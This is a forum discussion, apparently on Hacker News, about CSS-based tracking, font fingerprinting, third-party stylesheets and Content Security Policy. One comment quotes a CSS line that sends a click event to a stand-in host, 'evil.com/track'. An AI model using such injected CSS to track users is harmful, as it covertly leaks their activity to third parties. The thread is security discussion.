[saagarjha]

This article seems to have a threat model where a website is “compromised” into sending user data to a third party, but I don’t really see anything that protects users from a website whose owner actively wants to track them. This is an odd threat model to have.

Also, as an aside:

> For example, by detecting whether the browser supports the Calibri font family, we can assume that the browser is running in Windows

I’m pretty sure that Safari has stopped allowing the use of third party fonts for exactly this reason, and now reports a standard set of fonts as being available.

[javajosh]

You can't assume that only the origin will be serving css. Most pages these days contain resources from all over the web, and most developers assume that CSS is safe to load from anywhere. What's not clear to me is whether 'evil' in content: url("https://evil.com/track?action=link_clicked" can point to anywhere on the web? Or just the origin of the css? Or...?

[IggleSniggle]

Depends on the Content Security Policy of the site.

[javajosh]

Yes, of course - but what is the default if you don't have a CSP? I guess I will have to do the experiment.

[IggleSniggle]

Apologies, wasn't trying to be snarky. If you are configured to allow resources to load from anywhere, the CSS can load a resource from anywhere, not just the location it originated from. These kinds of configurations are increasingly less the default, however, so depending your specific setup, you may find that some origin policies are in place by default. This is entirely dependent on your chain, however, including browser settings.

[wongarsu]

There are multiple sites that allow users to set custom CSS. Consider for example subreddit styles on reddit or the customisation of Tumblr pages.

One big selling point for CSS was to separate layout and content exactly to allow other people to write CSS.

[rebuilder]

It's the threat model that the customers they're trying to bring in would care about.